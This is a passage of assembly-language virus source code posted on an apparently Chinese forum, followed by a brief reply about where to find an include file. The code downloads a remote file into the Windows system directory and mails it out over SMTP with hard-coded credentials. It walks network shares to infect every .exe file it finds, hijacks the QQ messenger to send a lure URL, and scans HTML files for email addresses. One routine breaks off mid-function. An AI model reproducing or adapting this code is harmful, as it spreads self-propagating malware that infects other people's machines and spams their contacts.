push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset dwFileName+ebx]
push ecx
call _CreateFile[ebx] ;create the destination file
cmp eax,INVALID_HANDLE_VALUE
jz DF_ret
mov hSaveFile[ebx],eax
call szInternetReadFile
db "InternetReadFile",0
szInternetReadFile:
push esi
call _GetProcAddress[ebx]
mov edi,eax ;edi = InternetReadFile
.repeat
lea ecx,[offset dwRead+ebx]
push ecx
push sizeof szBuffer
lea ecx,[offset szBuffer+ebx]
push ecx
push hHttpFile[ebx]
call edi ;read up to sizeof szBuffer bytes
.if eax
.break .if dwRead[ebx]== 0 ;EOF
push NULL
lea ecx,[offset dwWrite+ebx]
push ecx
push dwRead[ebx]
lea ecx,[offset szBuffer+ebx]
push ecx
push hSaveFile[ebx]
call _WriteFile[ebx] ;append the chunk
.endif
.until 0 ;NOTE: only EOF leaves the loop; a failing InternetReadFile (eax == 0) retries forever
Fexsting:
push MAX_PATH
lea edi,[offset dwFileName+ebx]
push edi
call _GetSystemDirectory[ebx]
or eax,eax
jz DF_ret
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx] ;rebuild dwFileName = <sysdir>\<dwFile> for the return value
DF_ret:
push hSaveFile[ebx]
call _CloseHandle[ebx]
call szInternetCloseHandle
db "InternetCloseHandle",0
szInternetCloseHandle:
push esi
call _GetProcAddress[ebx]
mov edi,eax
push hHttpFile[ebx]
call edi
push hSession[ebx]
call edi
popad
lea eax,[offset dwFileName+ebx] ;return the local path
ret
DownloadFile endp
;**************************************
;SendMail(eMail) -- minimal SMTP client: connect to smtp.163.com:25, AUTH LOGIN
; with hard-coded credentials (placeholders/redacted on this page), then send
; %SystemDirectory%\hello.eml (fetched earlier by DownloadFile) as the message
; to the address in eMail.
; In:  eMail -> recipient address string (NUL-terminated).
; Globals: wsa (WSADATA), sock (sockaddr_in), hFile1, dwRead.
; Server replies are never read (no recv import); each send length is a literal
; that has to match the string following the call. smtp.163.com, the EHLO name
; "o1i5a4" and the sender address are network indicators.
; Registers preserved (pushad/popad). Error exits fall to SM_ret, which closes
; hFile1 and the socket even if they were not opened by this call.
;**************************************
SendMail proc eMail:DWORD
pushad
lea ecx,[offset wsa+ebx]
push ecx
push 101h ;Winsock 1.1
call _WSAStartup[ebx]
or eax,eax
jnz SM_ret
push 0
push SOCK_STREAM
push AF_INET
call _socket[ebx]
cmp eax,-1h ;INVALID_SOCKET
jz SM_ret
mov esi,eax ;esi = socket
lea edi,[offset sock+ebx]
assume edi:ptr sockaddr_in
mov [edi].sin_family,AF_INET
push 25 ;SMTP
call _htons[ebx]
mov [edi].sin_port,ax
call PushSmtpSrvr ;push the address of the server name
db "smtp.163.com",0 ;hard-coded relay -- network IOC
PushSmtpSrvr:
call _gethostbyname[ebx]
assume eax:ptr hostent
mov eax,DWORD ptr [eax].h_list ;h_addr_list (a NULL return from gethostbyname is not checked)
mov eax,DWORD ptr [eax] ;first address entry
mov eax,DWORD ptr [eax] ;the IPv4 address
mov DWORD ptr[edi].sin_addr,eax
push sizeof sockaddr_in
push edi
push esi
call _connect[ebx]
cmp eax,-1h
jz SM_ret
push 0
push 13 ;strlen("EHLO o1i5a4\r\n")
call Ehlo
db "EHLO o1i5a4",0dh,0ah ;fixed EHLO name -- network IOC
buffer db 2000h dup(0) ;reply buffer; only used by the commented-out recv below
szCap db "test",0
Ehlo:
push esi
call _send[ebx]
push 0
push 12 ;strlen("AUTH LOGIN\r\n")
call Auth
db "AUTH LOGIN",0dh,0ah
Auth:
push esi
call _send[ebx]
push 0
push 18 ;byte count for the user-name line (literal; must match the string below)
call szUserName
db "dfadsfaadf",0dh,0ah,0 ;base64 user name (placeholder on this page)
szUserName:
push esi
call _send[ebx] ;send the user name
push 0
push 14 ;byte count for the password line (literal)
call Pass
password db "xxxxxxxxx",0dh,0ah,0 ;base64-encoded password (redacted on this page)
Pass:
push esi
call _send[ebx]
;invoke recv,esi,addr buffer,2000h,0
;invoke MessageBox,NULL,addr buffer,addr szCap,MB_OK
push 0
push 32 ;byte count for the MAIL FROM line (literal)
call Mailfrom
db "MAIL FROM: [email]xxxx@163.com[/email]",0dh,0ah ;sender (redacted; [email] tags are forum markup)
Mailfrom:
push esi
call _send[ebx]
jmp Next ;skip over the inline data
szRcpt db "RCPT TO: <%s>",0dh,0ah,0
Rcpt db 80 dup(0) ;formatted RCPT line; wsprintf is unbounded, so an eMail longer than ~66 chars overruns it
Next:
push eMail
lea ecx,[offset szRcpt+ebx]
push ecx
lea ecx,[offset Rcpt+ebx]
push ecx
call _wsprintf[ebx] ;Rcpt = "RCPT TO: <eMail>\r\n"
add esp,0ch ;wsprintf is cdecl: caller removes the 3 args
lea ecx,[offset Rcpt+ebx]
push ecx
call _lstrlen[ebx]
push 0
push eax
lea ecx,[offset Rcpt+ebx]
push ecx
push esi
call _send[ebx]
push 0
push 6 ;strlen("DATA\r\n")
call vData
db "DATA",0dh,0ah
vData:
push esi
call _send[ebx]
push MAX_PATH
call szSysDir ;push the address of SysDir
SysDir db MAX_PATH dup(0)
szSysDir:
call _GetSystemDirectory[ebx]
call szfile ;push the address of "\hello.eml"
db "\hello.eml",0
szfile :
lea ecx,[offset SysDir+ebx]
push ecx
call _lstrcat[ebx] ;SysDir = <sysdir>\hello.eml
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset SysDir+ebx]
push ecx
call _CreateFile[ebx]
mov hFile1[ebx],eax
cmp eax,INVALID_HANDLE_VALUE
jz SM_ret
push NULL
push hFile1[ebx]
call _GetFileSize[ebx]
push esi ;save the socket
mov esi,eax ;esi = file size
push PAGE_READWRITE
push MEM_COMMIT
push esi
push NULL
call _VirtualAlloc[ebx] ;buffer for the whole message; NULL return not checked, never freed
mov edi,eax
push 0
lea ecx,[offset dwRead+ebx]
push ecx ;bytes actually read
push esi ;bytes to read
push edi ;buffer
push hFile1[ebx]
call _ReadFile[ebx]
pop esi ;restore the socket
mov ecx,DWORD ptr dwRead[ebx]
re2:
;send the body in 1000-byte chunks, then the remainder
sub ecx,1000
jb ex ;fewer than 1000 bytes left
push ecx
push 0
push 1000
push edi
push esi ;socket
call _send[ebx]
add edi,1000
pop ecx
jmp re2
ex:
add ecx,1000 ;ecx = remaining bytes (may be 0)
push 0
push ecx
push edi
push esi
call _send[ebx]
push 0
push 5 ;"\r\n.\r\n" end-of-data marker
call szEndData
db 0dh,0ah, ".",0dh,0ah,0
szEndData:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx] ;wait instead of reading the server's reply
push 0
push 6 ;strlen("QUIT\r\n")
call szQuit
db "QUIT",0dh,0ah,0
szQuit:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx]
SM_ret:
push hFile1[ebx]
call _CloseHandle[ebx]
push esi
call _closesocket[ebx]
call _WSACleanup[ebx]
popad
ret
SendMail endp
myCallBack dd 0 ;routine EnumNetObject calls for each resource; a single global, overwritten by each nesting level and never restored
EnumNetBoot proc ;level 0 of the network walk: root -> workgroups -> computers -> shares -> files
; Each level installs the next level's routine in myCallBack and calls EnumNetObject
; with ebp -> parent NETRESOURCE (NULL here) and eax = dwUsage filter. Because
; myCallBack is shared and not restored on return, once a deeper level has run the
; outer loop continues with whatever the deepest level installed.
pushad
mov ebp,NULL ;start at the network root
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetWorkGroup+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
popad
ret
EnumNetBoot endp
EnumNetWorkGroup proc ;level 1: called for each container found at the root (workgroup/domain)
;ebp -> parent NETRESOURCE (the container just returned to EnumNetObject's loop)
push ecx
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetComputer+ebx]
mov DWORD ptr myCallBack[ebx],ecx ;next level: computers inside this container
call EnumNetObject
pop ecx
ret
EnumNetWorkGroup endp
EnumNetComputer proc ;level 2: called for each computer container
;ebp -> parent NETRESOURCE (the computer)
push ecx
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetComputerShareDir+ebx]
mov DWORD ptr myCallBack[ebx],ecx ;next level: shares on this computer
call EnumNetObject
pop ecx
ret
EnumNetComputer endp
EnumNetComputerShareDir proc ;level 3: enumerate connectable disk shares of one computer
;ebp -> parent NETRESOURCE (the computer)
push ecx
mov eax,RESOURCEUSAGE_CONNECTABLE ;shares we can map, not containers
lea ecx,[offset DisplayMsg+ebx]
mov DWORD ptr myCallBack[ebx],ecx ;leaf handler for each share
call EnumNetObject
pop ecx
ret
EnumNetComputerShareDir endp
DisplayMsg proc ;leaf of the network walk: ebp -> NETRESOURCE of a connectable share
; Nothing is displayed despite the name: the share's UNC path (lpRemoteName) is
; handed to EnumFileObject, which infects *.exe files under it. edi is clobbered.
push ebp
assume ebp:ptr NETRESOURCE
mov eax,[ebp].lpRemoteName
mov edi,[ebp].lpProvider
mov ebp,[ebp].lpRemoteName ;ebp -> "\\server\share"
call EnumFileObject
pop ebp
ret
DisplayMsg endp
;//Enumerate one level of network resources with WNetOpenEnum / WNetEnumResource.
EnumNetObject proc
;//In: eax = dwUsage filter, ebp -> parent NETRESOURCE (NULL for the root),
;//    myCallBack[ebx] -> routine to call per resource. (The original comment says
;//    "ebx = callback"; in this code ebx is the relocation delta throughout.)
;//The callback sees ebp -> the current NETRESOURCE in a 100h-byte stack buffer.
;//Registers preserved (pushad/popad).
pushad
push eax ;slot that receives hEnum
push esp ;lphEnum
push ebp ;lpNetResource (parent)
push eax ;dwUsage
push RESOURCETYPE_DISK
push RESOURCE_GLOBALNET
call _WNetOpenEnumA[ebx]
pop esi ;//esi = hEnum; also removes the slot pushed above
or eax,eax
jnz short EnumNetObjectError ;NO_ERROR == 0
sub esp,100h
mov ebp,esp ;//ebp -> 100h-byte NETRESOURCE buffer on the stack
LoopEnumNetObject:
mov eax,1
push eax
;//lpcCount = 1: fetch one resource per call
mov eax,esp
push 100h ;//buffer size value
push esp ;//lpBufferSize -> the value just pushed
push ebp ;//lpBuffer
push eax ;//lpcCount
push esi ;//hEnum
call _WNetEnumResourceA[ebx]
pop edi
pop edi ;//discard the two temporaries (size, count)
or eax,eax
jnz short EnumNetObjectOver ;//ERROR_NO_MORE_ITEMS or any failure ends this level
call myCallBack[ebx] ;//handle the resource at [ebp]
jmp short LoopEnumNetObject
EnumNetObjectOver:
push esi
call _WNetCloseEnum[ebx]
add esp,100h ;//release the buffer
EnumNetObjectError:
popad
ret
EnumNetObject endp
;//Recursively walk a directory (local path or UNC share) and infect the *.exe files in it.
EnumFileObject proc
;//In: ebp -> directory path; it is made the current directory and ".." restores the parent on exit.
;//A 100h-byte stack buffer is used both for the "*.*" pattern and as the
;//WIN32_FIND_DATA output. NOTE(review): sizeof(WIN32_FIND_DATAA) is 140h on Win32
;//(not shown here -- verify); if so FindFirstFile/FindNextFile write 40h bytes past
;//the buffer into the pushad save area and return address. The original comment
;//claims a 200h-byte buffer. Registers preserved by pushad/popad.
pushad
push ebp
call _SetCurrentDirectoryA[ebx]
or eax,eax
jz SetDirError
mov edi,100h
sub esp,edi ;//100h-byte buffer (original comment said 200h)
mov DWORD ptr [esp],2a2e2ah ;//"*.*",0 as a little-endian DWORD
mov eax,esp
push esp ;//lpFindFileData = the same buffer
push eax ;//lpFileName = "*.*"
call _FindFirstFile[ebx]
mov esi,eax ;//esi = find handle
inc eax
jz short EnumFileObjectError ;//INVALID_HANDLE_VALUE (-1)
LoopEnumFileObject:
;//NOTE: the entry returned by FindFirstFile is never examined; the loop starts with FindNextFile
push esp
push esi
call _FindNextFile[ebx]
;invoke FindNextFileA,esi,esp
or eax,eax
jz short EnumFileObjectOver
mov edi,esp
assume edi:ptr WIN32_FIND_DATA
lea ebp,[edi].cFileName
mov eax,[edi].dwFileAttributes
and eax,10h ;//FILE_ATTRIBUTE_DIRECTORY
jz short IsFileObject
IsDirObject: ;//directory
mov eax,DWORD ptr [ebp]
cmp al,"." ;//skip "." and ".." (and any name starting with a dot)
jz short LoopEnumFileObject
call EnumFileObject ;//recurse; ebp -> sub-directory name relative to the current directory
jmp short LoopEnumFileObject
IsFileObject: ;//file
call FoundFileObject ;//check extension and infect
jmp short LoopEnumFileObject
EnumFileObjectOver:
push esi
call _CloseHandle[ebx] ;//note: the find handle is released with CloseHandle here, not FindClose
EnumFileObjectError:
mov DWORD ptr [esp],2e2eh ;// "..",0,0 -> step back to the parent directory
push esp
call _SetCurrentDirectoryA[ebx]
add esp,100h ;//release the buffer
SetDirError:
popad
ret
EnumFileObject endp
FoundFileObject proc
;//In: ebp -> bare file name (WIN32_FIND_DATA.cFileName) in the current directory.
;//If the name ends in ".exe" (case-insensitive via OR 20202020h), build
;//<current dir>\<name> in CurrentDirectory and call InfectFile.
;//NOTE(review): ecx is loaded with the buffer address only once; lstrcat is a
;//stdcall Win32 call and is not required to preserve ecx, so the second lstrcat
;//and InfectFile presumably receive whatever lstrcat left in ecx -- verify.
;//CurrentDirectory is never reset, so repeated calls keep appending.
pushad
mov edi,ebp
xor eax,eax
LoopFindExtName:
inc edi ;//scan to the NUL terminator
cmp [edi],al
jnz LoopFindExtName
mov eax,DWORD ptr[edi-4] ;//last 4 characters
or eax,20202020h ;//lower-case them
cmp eax,"exe." ;//".exe"
jnz NotExeFile
call szCurrentDirectory ;//push the address of the CurrentDirectory buffer
CurrentDirectory db MAX_PATH dup (0)
szCurrentDirectory:
push MAX_PATH
call _GetCurrentDirectoryA[ebx] ;//GetCurrentDirectoryA(MAX_PATH, CurrentDirectory)
call szA ;//push the address of "\"
db "\",0
szA:
lea ecx,[offset CurrentDirectory+ebx]
push ecx
call _lstrcat[ebx] ;//CurrentDirectory += "\"
push ebp
push ecx ;//ecx not reloaded -- see note above
call _lstrcat[ebx] ;//intended: CurrentDirectory += name
push ecx
call InfectFile
NotExeFile:
popad
ret
FoundFileObject endp
;************************************
;GetMprFunction -- load mpr.dll and resolve the three WNet* enumeration APIs into
; _WNetOpenEnumA / _WNetEnumResourceA / _WNetCloseEnum (slots embedded next to
; their name strings). LoadLibraryA failure is not checked; a failed lookup
; leaves a slot 0 and the later indirect call through it faults.
; Registers preserved.
;************************************
GetMprFunction proc
pushad
call szMpr ;push the address of "mpr.dll"
db "mpr.dll",0
szMpr:
call _LoadLibraryA[ebx]
mov edi,eax ;edi = hMpr
call szWNetOpenEnum ;push the address of the name
db "WNetOpenEnumA",0
_WNetOpenEnumA dd 0
szWNetOpenEnum:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetOpenEnumA[ebx],eax
call szWNetEnumResourceA
db "WNetEnumResourceA",0
_WNetEnumResourceA dd 0
szWNetEnumResourceA:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetEnumResourceA[ebx],eax
call szWNetCloseEnum
db "WNetCloseEnum",0
_WNetCloseEnum dd 0
szWNetCloseEnum:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetCloseEnum[ebx],eax
popad
ret
GetMprFunction endp
;***********************************
;QQ_Thread -- worker thread that hijacks the QQ (Tencent IM) "send message" dialog.
; Param is unused. Single instance via the mutex "logincom" (host IOC). Loop:
; find a top-level window titled "发送消息" ("send message"), locate its RICHEDIT
; child and the "送讯息(&S)" ("send message") button, set the edit text to a lure
; containing a URL (redacted on this page), click the button, sleep 2 s, repeat.
; The thread ends as soon as the dialog or button is not found (no retry).
; NOTE(review): ebx is used as the relocation delta, but a CreateThread entry
; receives no such value -- how ebx is seeded for this thread is not visible here.
;***********************************
QQ_Thread proc uses ebx esi edi Param:DWORD
pushad
call szMutex ;push the address of the mutex name
MutexName db "logincom",0
szMutex:
push FALSE
push NULL
call _OpenMutex[ebx] ;OpenMutexA(0, FALSE, "logincom")
or eax,eax
jnz QQ_ret ;another instance owns it -> leave
lea ecx,[offset MutexName+ebx]
push ecx
push FALSE
push NULL
call _CreateMutex[ebx] ;CreateMutexA(NULL, FALSE, "logincom")
;********************************
;send loop
;********************************
re4:
call szWincap ;push the address of the window title
db "发送消息",0 ;QQ send-message dialog title
szSend db "送讯息(&S)",0 ;caption of the Send button
szMsg db "最感人的故事,最煽情的文章.一切尽在",0dh,0ah ;lure text ("the most touching stories, the most sensational articles, all at")
db "[url]http://www.xxx.net/index.htm[/url]",0 ;lure URL (redacted; [url] tags are forum markup)
szClass db "RICHEDIT",0
QQSend dd 0 ;hwnd of the dialog
hEdit dd 0 ;hwnd of the message edit control
hSend dd 0 ;hwnd of the Send button
szWincap:
push NULL
call _FindWindowA[ebx] ;FindWindowA(NULL, "发送消息")
mov DWORD ptr QQSend[ebx],eax
or eax,eax
jz QQ_ret ;dialog not open -> thread exits
push 0
lea ecx,[offset szClass+ebx]
push ecx
push NULL
push QQSend[ebx]
call _FindWindowExA[ebx] ;first RICHEDIT child
mov DWORD ptr hEdit[ebx],eax
lea ecx,[offset szSend+ebx]
push ecx
push NULL
push NULL
push QQSend[ebx]
call _FindWindowExA[ebx] ;child captioned "送讯息(&S)"
mov DWORD ptr hSend[ebx],eax
or eax,eax
jz QQ_ret
lea ecx,[offset szMsg+ebx]
push ecx
push 0
push WM_SETTEXT
push hEdit[ebx]
call _SendMessageA[ebx] ;put the lure into the edit control
push 0
push 0
push BM_CLICK
push hSend[ebx]
call _SendMessageA[ebx] ;press Send
push 2000
call _Sleep[ebx]
jmp re4
QQ_ret:
popad
ret
QQ_Thread endp
;*****************************************
;分析MailFileName(*.htm*),寻找Mail_Addr.
;pkxp的代码
;*****************************************
Parse_HTM PROC htmFileName :DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL SafeFSize: DWORD
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push htmFileName
call _CreateFile[ebx]
or eax,eax
jz PH_Exit
mov hFile , eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push hFile
call _CreateFileMapping[ebx]
or eax,eax
jz PH_Close
mov hMapping,eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push hMapping
call _MapViewOfFile[ebx]
or eax,eax
jz PH_Close2
xchg eax,esi ;esi = pMapping
push 0
push hFile
call _GetFileSize[ebx]
sub eax,16 ;For security
add eax,esi
mov SafeFSize,eax ;esi必须小于SafeFSize
.while esi < SafeFSize
push esi
xor edx,edx ;Valid = FALSE
@pushsz "mailto:"
pop edi
push 7 ;"mailto:" 字符串长度
pop ecx
repz cmpsb
.if zero? ;找到 mailto:
lea edi,[offset TempMailTo+ebx]
push edi
.while esi
sock sockaddr_in <0>
wfd WIN32_FIND_DATA <0>
hProcess dd 0
_GetProcessAddress dd 0
hMem dd 0
E8_addr dd 0
VirusLen=$-offset VStart
VEnd:
End VStart [/language] 请问useful.inc文件在哪下载? [quote][b]这里是引用第[/b][color=#ff0000][1 楼][/color][b]的[color=#000066]cnsword[/color]于[/b]2006-08-05 03:43[b]发表的:[/b]
请问useful.inc文件在哪下载?[/quote]
29A的杂志里有 谢谢,我去看看!